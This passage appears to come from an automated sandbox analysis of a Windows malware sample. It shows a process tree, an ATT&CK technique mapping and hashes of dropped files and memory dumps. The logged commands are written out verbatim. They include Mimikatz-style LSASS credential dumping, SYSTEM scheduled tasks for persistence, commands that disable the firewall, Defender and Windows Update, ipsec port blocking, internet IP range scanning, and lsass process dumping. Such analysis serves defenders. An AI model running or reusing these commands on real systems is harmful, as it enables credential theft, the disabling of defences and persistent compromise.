      net stop npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1004
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1992
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4492
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5028
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3916
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3468
- - C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe
    C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ppgkyibiq\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:2288
- - C:\Windows\ppgkyibiq\Corporate\vfshost.exe
    C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2748
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:384
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4344
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:768
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3548
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3920
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3068
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1724
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4244
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4076
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4520
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3980
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3400
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:856
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1128
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5036
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:5044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:800
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:2124
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2476
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:1384
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3036
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 772 C:\Windows\TEMP\ppgkyibiq\772.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3452
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4244
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:3344
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2444
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:3172
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1596
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:4880
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:3716
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4668
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:3416
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:4524
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:1308
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:4512
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:740
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:1528
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 1016 C:\Windows\TEMP\ppgkyibiq\1016.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4432
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2056 C:\Windows\TEMP\ppgkyibiq\2056.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4752
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2628 C:\Windows\TEMP\ppgkyibiq\2628.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2956 C:\Windows\TEMP\ppgkyibiq\2956.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3640
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2964 C:\Windows\TEMP\ppgkyibiq\2964.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2288
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 392 C:\Windows\TEMP\ppgkyibiq\392.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3780
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3748 C:\Windows\TEMP\ppgkyibiq\3748.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2756
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3872 C:\Windows\TEMP\ppgkyibiq\3872.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4276
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3940 C:\Windows\TEMP\ppgkyibiq\3940.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4156
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 4012 C:\Windows\TEMP\ppgkyibiq\4012.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2260
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 1988 C:\Windows\TEMP\ppgkyibiq\1988.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2512
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 4268 C:\Windows\TEMP\ppgkyibiq\4268.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3896
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 1320 C:\Windows\TEMP\ppgkyibiq\1320.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2424
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3360 C:\Windows\TEMP\ppgkyibiq\3360.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1808
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2156 C:\Windows\TEMP\ppgkyibiq\2156.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2368 C:\Windows\TEMP\ppgkyibiq\2368.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3420
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 988 C:\Windows\TEMP\ppgkyibiq\988.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3464
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat
  2⤵
  PID:1932
- - C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe
    vmlbqggye.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:4260
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:3496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5348
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4364
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2616
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5536

C:\Windows\SysWOW64\qicmew.exe
C:\Windows\SysWOW64\qicmew.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4368

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
1⤵
PID:2428
- C:\Windows\ime\yittybr.exe
  C:\Windows\ime\yittybr.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:368

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
1⤵
PID:1432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1012
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
  2⤵
  PID:4896

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
1⤵
PID:3932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2980
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
  2⤵
  PID:4924

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
1⤵
PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:320
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
  2⤵
  PID:3844

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
1⤵
PID:2900
- C:\Windows\ime\yittybr.exe
  C:\Windows\ime\yittybr.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4668

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
1⤵
PID:5424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2028
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
  2⤵
  PID:3932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\TEMP\lntjubmbe\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\ppgkyibiq\1016.dmp

Filesize
33.8MB

MD5
66076e968533bc67410f4cf533067400

SHA1
5bfbc9c5d3e63382f1ca1d6d98421b6e6d84218b

SHA256
8c3728f606551701dae9363c050b36a5b13e06127a0e36a6152cc295b6414661

SHA512
7c92d1e8839d60e36ab042d9953042cf85d4cfa6965960e1126f86d7eb5958e867a0a5f156d57ace7213ba3627ba4005b4150da5bdc7ec1393d9dd148c872d95

Download Submit
C:\Windows\TEMP\ppgkyibiq\1320.dmp

Filesize
8.7MB

MD5
ee30f17d7d1461078f24e533d9146014

SHA1
0344e1cb120070fe742e820e3934bbffc1673ef1

SHA256
6ab0c568051d4c72c338d7d9c73f8e14cee12c8d475b50ffb1e8a6a006855354

SHA512
f8930afb2a99c31a1d6e596770d95f2647c22e6a4e3680d932dfa8705a082a2960f90580ab27369f44e885b4db02cf4da181083820a5cdc6c4b187e71b03c666

Download Submit
C:\Windows\TEMP\ppgkyibiq\1988.dmp

Filesize
25.8MB

MD5
ab4b744234bec0113bf55c5c545c45c2

SHA1
fd5b7a59f13e5181ec590135e4d58f0460adea26

SHA256
d5fc2810fcdefa5460d65d2007df3278f106de4cc9eb483dcb329075e9ef89a8

SHA512
96a3ea970b6f840f720dc013eea1310040090d100d85ec2ebc58bfce70c54fce1fddd5ed9e02267be90d5d24c0891ff371a2e9448ba53ba4be72ca0696b4c3da

Download Submit
C:\Windows\TEMP\ppgkyibiq\2056.dmp

Filesize
4.1MB

MD5
7f92d5ddad66c223820559904380cef6

SHA1
eebed849661cbc8e36f6885a8fabe3403eeb3500

SHA256
ca42a019b7cfd7ef31c5125fe2c1b93a3f2978214bf0f6811a83a85523b74527

SHA512
ecc2c1c11f26f7773a9c307eda420fabce5b734bd08d2366fde3eeb0e48fec930a46a5351a9ad4777d7a9222652605031a6858ec8183f9983e8c806ad5bedfdd

Download Submit
C:\Windows\TEMP\ppgkyibiq\2156.dmp

Filesize
1.3MB

MD5
7a55ff4ea1cf3d640a9de742067f5953

SHA1
465b0cd5dd12e3d062a357e172a3e44aa3d874a6

SHA256
5fe614107761bc612595df4927b603c552f6f103154c1c0019520978adb4b122

SHA512
73fe4cf3b54e078d9b2c7f9658250dbe05bbf3ce34991b1655b5e0b9cf380566c0dbcc848a49f71a088bb55f36cb837db3b75964fc93476a48b6639ffe59cd85

Download Submit
C:\Windows\TEMP\ppgkyibiq\2368.dmp

Filesize
6.5MB

MD5
7004ea8d2b8995a69b1e224a4716f218

SHA1
456d0123172645456476744dab3205c877f4ffcf

SHA256
cc1a5e3e9ecd3ed6755c7923e86b1b60ebf544f551688f7e09614e3c9c188f85

SHA512
2493412b701ff94e2b7670d9cbcfde06e0c60526186979ea8442caea47ba6c1cbdf5b4e281ee6d973be248e45145fbdd8bd7c2238240a757ad15d69f0d206876

Download Submit
C:\Windows\TEMP\ppgkyibiq\2628.dmp

Filesize
7.4MB

MD5
236642d19ebdaca990364f266a2d5ef6

SHA1
327eaefa73b089d2ce1bc84ab5c896ccb52d716e

SHA256
d75cac3fd3962e531bcf60b4935b9de1fcaa8e1a45395334a3da9c0623e56127

SHA512
adc4fa9f62cd8de3f80fc63038c760bf80667fed63485ae3ecd1f0b5d1073ffd38a9ba0f31987fd3f52fd2f5c49f0d1eb70ed66d74013c6f4f31166b3ca97445

Download Submit
C:\Windows\TEMP\ppgkyibiq\2956.dmp

Filesize
814KB

MD5
ad8f1cb62384b63ff6310c58eb9a12d2

SHA1
31b0bf2681cbec62751916ef67796a82429b09b0

SHA256
3179c6538988d64be876633d2c0b9eaefc8d8da92982d3d00265184d62065972

SHA512
2d8443c25531a9d75cd2b547b7baf6051411b1785f9aa734c48625541fe6650c6b387b7dd9014fa0828683befffa659c035ef0af8ad5631f98e72c3be6995cc8

Download Submit
C:\Windows\TEMP\ppgkyibiq\2964.dmp

Filesize
3.8MB

MD5
cf48f1d9393617abd0b77ede260bfbd6

SHA1
68504d12d415fc8695208b7f56bb7ba1b51f3d60

SHA256
4616a79680480341c287a1a6869bb89a1e58134eafc7a48d870f148766c8ff2a

SHA512
0541033f70e1e6ffb05685eb4898e6ff7c8a23a7f8b58ba9ac49fec1ae24e88cbefca5623672287b51c5b12f60f02ce77b0a31b4f2e5ede13c78c0876e816301

Download Submit
C:\Windows\TEMP\ppgkyibiq\3360.dmp

Filesize
2.8MB

MD5
983325acb7ae085251d2699b5211ba6a

SHA1
c265da508a9cad7ff5d806ba29114f87540f6ccb

SHA256
9b95caddcaae660df9b32c2b0cc02ffe239ceef5573a8889b3190c6989ee5575

SHA512
ce1c2e152e4ce9b268b7319cad1e13ecddbfa29620c4948bee9e0d658d60b9c5172caf25bda304e2e1f6b1f26e20c693b20fb553bc63b3a8a54c07532991906c

Download Submit
C:\Windows\TEMP\ppgkyibiq\3748.dmp

Filesize
2.7MB

MD5
974048564b4aa3bb4d87102351a6e960

SHA1
293e8390da05b53b1b1bf9e5afc73c2ea77682e0

SHA256
a35f0fc04f12292d960381d02804b570c27b83e09243ac1d8910ffef111a797d

SHA512
e2dddd90385c4b7af3bcecd43dda36754d617edc9aa5ae68fb504fb9327b984a5ac79990b31e796f29202b7327c98056e8f687ca21518b03f72cab41f35590af

Download Submit
C:\Windows\TEMP\ppgkyibiq\3872.dmp

Filesize
21.0MB

MD5
4c4696e87e4f5f1185231898a7d2f450

SHA1
054db97d7471dbac2f3c94107f2ba2107da5bfed

SHA256
1f40aa551a6ebb24004fe7cbaaf3f383b837e591854a6964e426ddaa2c939b7a

SHA512
607362b133b4a40ce340a4ada576c66bb09b69625decbb4e8019208bd10ab4d577e435389957881cfb9cef522028d7a8033e5c429a63414598570ee0044016d9

Download Submit
C:\Windows\TEMP\ppgkyibiq\392.dmp

Filesize
2.9MB

MD5
3633d43bc723fe40d43d2f90c37e6067

SHA1
66e8c710a9bab4fc5be34c4f9eb8ebaf96c51098

SHA256
fce6bcea8610fbaa541ae01905b2abb2b0eb0148e5ee4a2eb2a7325ef0057143

SHA512
016ff8e5e05fcd6fc0d6857d89fc8c54fe2b65de9e9e2dd805cfebea9392e7457ee1b27d2b6380a59b8a09ec3dcdb448bc3331ea29e59e953987dd43fb889519

Download Submit
C:\Windows\TEMP\ppgkyibiq\3940.dmp

Filesize
8.5MB

MD5
04aaa32f52818f6cad7c120867b8bd4a

SHA1
e2afc12a3e8dea82fc5298588d726702cb4fa414

SHA256
40af63dc7c4d3e9c8f4c3755b02093292ac970f89c1ee11a199c7349f2737638

SHA512
b66e468392e6938d52e6b7569329e394f0879060f5a804c6d47560cd88c510d4beb4a792e4ec44abd2016d8bf241e9aff1e9006d32f7af5b5f8154efb1c688f6

Download Submit
C:\Windows\TEMP\ppgkyibiq\4012.dmp

Filesize
43.6MB

MD5
26e8a585b28f8bc08b69ebb92407055f

SHA1
673a3593075b9a1c4e815d5940903fe46d5e806b

SHA256
9bbbdf1579b6dd642e95d5b66987cab7d8d44c2225c6ffb6aed7bbb983215c0c

